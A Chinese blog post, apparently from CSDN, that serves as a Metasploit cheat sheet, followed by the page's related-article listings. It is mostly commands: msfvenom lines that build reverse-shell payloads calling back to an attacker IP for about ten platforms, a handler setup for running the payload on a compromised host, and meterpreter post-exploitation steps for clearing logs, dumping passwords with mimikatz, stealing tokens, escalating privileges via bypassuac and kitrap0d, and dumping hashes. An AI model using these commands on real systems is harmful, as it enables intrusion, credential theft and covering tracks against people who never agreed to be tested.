Metasploit的使用

最新推荐文章于 2024-07-29 08:36:41 发布
最新推荐文章于 2024-07-29 08:36:41 发布
阅读量313 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/110634682
版权

常用命令

msfconsole			进入msf终端
search  xxx			搜索相关漏洞
use xxx				使用漏洞模块
info				显示某模块的详细信息
show options 		显示某模块的详细信息
show targets 		查看该模块适用的攻击目标类型
show exploits 		查看可用漏洞 
show auxiliary 		查看可用辅助攻击工具 
show payloads 		查看攻击载荷
sessions -l			查看会话

msfvenom生成攻击载荷

生成可执行文件,无需进入msf终端操作

Linux:		msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f elf > shell.elf
Windows:	msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f exe > shell.exe
Mac:		msfvenom -p osx/x86/shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f macho > shell.macho
ASP:		msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f asp > shell.asp
JSP:		msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f raw > shell.jsp
WAR:		msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f war > shell.war
Python:		msfvenom -p cmd/unix/reverse_python LHOST=攻击IP LPORT=监听端口 -f raw > shell.py
Bash:		msfvenom -p cmd/unix/reverse_bash LHOST=攻击IP LPORT=监听端口 -f raw > shell.sh
Perl:		msfvenom -p cmd/unix/reverse_perl LHOST=攻击IP LPORT=监听端口 -f raw > shell.pl
PHP:		msfvenom -p php/meterpreter_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f raw > shell.php
			cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

开启监听,以windows示例,然后将可执行文件上传到肉机上执行

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST x.x.x.x
msf5 exploit(multi/handler) > set LPORT xx
msf5 exploit(multi/handler) > run

meterpreter后渗透攻击

基本系统命令
meterpreter > background  	切到后台
meterpreter > exit  		关闭会话
meterpreter > help  		帮助信息
meterpreter > sysinfo		系统平台信息
meterpreter > getuid 		查看权限 
meterpreter > getpid 		获取当前进程的pid
meterpreter > shell  		进入目标机cmd shell
meterpreter > ps			查看当前活跃进程
进程迁移
ps   			 查看当前活跃进程
migrate <pid>  	 将会话移植到指定pid值进程中
清除日志
clearav  		清除windows中的应用程序日志、系统日志、安全日志
抓取密码
load mimikatz    加载mimikatz模块
wdigest  		 获取Wdigest密码
令牌操纵
1.假冒令牌
use incognito    加载窃取令牌模块
list_tokens -u   查看可用的用户令牌
impersonate_token 'NT AUTHORITY\SYSTEM'  假冒SYSTEM token
2.窃取令牌
ps						查看当前活跃进程
steal_token <pid值>   	从指定进程中窃取token
提权
1.getsystem提权
meterpreter > getsystem
2.bypassuac提权

常见msf内置bypassuac模块

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_silentcleanup
exploit/windows/local/bypassuac_vbs

use exploit/windows/local/bypassuac
set session 会话ID
run
3.本地漏洞提权

利用enum_patches模块搜集补丁信息,然后寻找可利用的exploits进行提权

run post/windows/gather/enum_patches  查看补丁信息
background
search MS10-015
use exploit/windows/local/ms10_015_kitrap0d
set session 会话ID
run
窃取hash
hashdump
run post/windows/gather/smart_hashdump

参考文章

https://xz.aliyun.com/t/3007
https://xz.aliyun.com/t/6400#toc-29

Franchi小白帽
关注
Metasploit 基本使用
qq_44237206的博客
05-16 307
Metasploit程序需要使用Postgresql数据库。 PostgresqI概述: PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。 官网:https://www.postgresql.org/ 注:PostgreSQL:世界上最先进的开源关系数据库 扩展:PostgreSQL和 MySQL数据的应用场景区别: 从应用场景来说,PostgreSQL更加适合严格的..
metasploit使用手册.xmind
10-16
metasploit神器总结,介绍基本命令、模块、信息收集、后渗透攻击等。渗透攻击步骤。主机扫描。辅助模块端口扫描。查找可用端口模块。msf>search portscan。服务扫描、辅助模块
Metasploit的基本使用教程
dianzhao6995的博客
10-16 448
今天给大家带来的是关于Metasploit的基本使用教程,使用到的工具是kali linux(命令行模式) 关于Metasploit的发展进程大家自行百度我就不一一赘述了 首先先打开 msfconsole 从图中我们可以看到Metasploit中集成的很多的攻击模块 通过show命令我们可以查看这些模块 下面我们使用Windows的著名漏洞ms10-018(浏览器提...
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
最新发布
Python_0011的博客
07-29 949
Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具。
Metasploit使用教程
Kali与编程
03-23 2003
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
metasploit使用介绍
qq_57223070的博客
10-12 5151
一些个人见解,希望能够对你有所帮助!
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
Metasploit使用教程[汇编].pdf
10-11
Metasploit 使用教程汇编 Metasploit 是一个功能强大的渗透测试工具包,主要用于渗透测试和漏洞利用。该工具包提供了一个强大的框架,用于自动化渗透测试和漏洞利用。下面是 Metasploit 使用教程的详细说明: 安装...
Metasploit使用手册
12-22
Metasploit使用手册,详细介绍各种黑客工具,溢出的使用
Metasploit基本使用
qq_68233961的博客
11-05 748
Metasploit基本使用
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1523
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
网络安全之Metasploit使用
qq_52074678的博客
05-05 3400
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
Metasploit(MSF)使用详解
m0_74806866的博客
11-30 768
本篇文章通过一次渗透测试,向大家介绍关于Metasploit使用、参数和渗透测试的应用
Metasploit入门使用手册
m0_67392126的博客
03-21 2114
Metasploit基础 Metasploit使用的数据库是posetpresql,在msf5之前启动的话需要安装数据库格式化数据库,设置用户和密码去进行连接,而在msf5之后不需要在这样操作,只需在kali的命令行中使用msfdb init就可以初始化并开启msf的数据库,然后在输入msfconsole就可以启动msf,进入之后我们可以使用db_status来进行查看连接数据库的状态。除此在外我们还可以使用kage实现界面话。 1.msf目录结构 在kali当中默认安装,文件路径是在/usr/sha
【超详细】渗透测试平台Metasploit使用教程(框架介绍、靶机安装、基本使用方法)
fly_enum的博客
12-22 4373
Metasploitframework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
metasploit 学习与使用
weixin_43894771的博客
03-12 342
使用msfconsole命令进入msf 我认为重要的两部分是exploit和payload 一个是选择攻击方式一个是选择攻击载荷,合适的攻击方式有利于渗透成功,合适的payload有利于成功之后搭建通道 输入help可以查看使用过程中需要的参数或者指令 show options 显示他有哪些参数 show payloads 查看库 show exploits 就看以看到不同已知漏洞的利用程序 会...
Metasploit基础教程和简单使用
qq_41344881的博客
08-07 1182
一、工具概述#二、使用方法#三、常用命令#四、举例使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值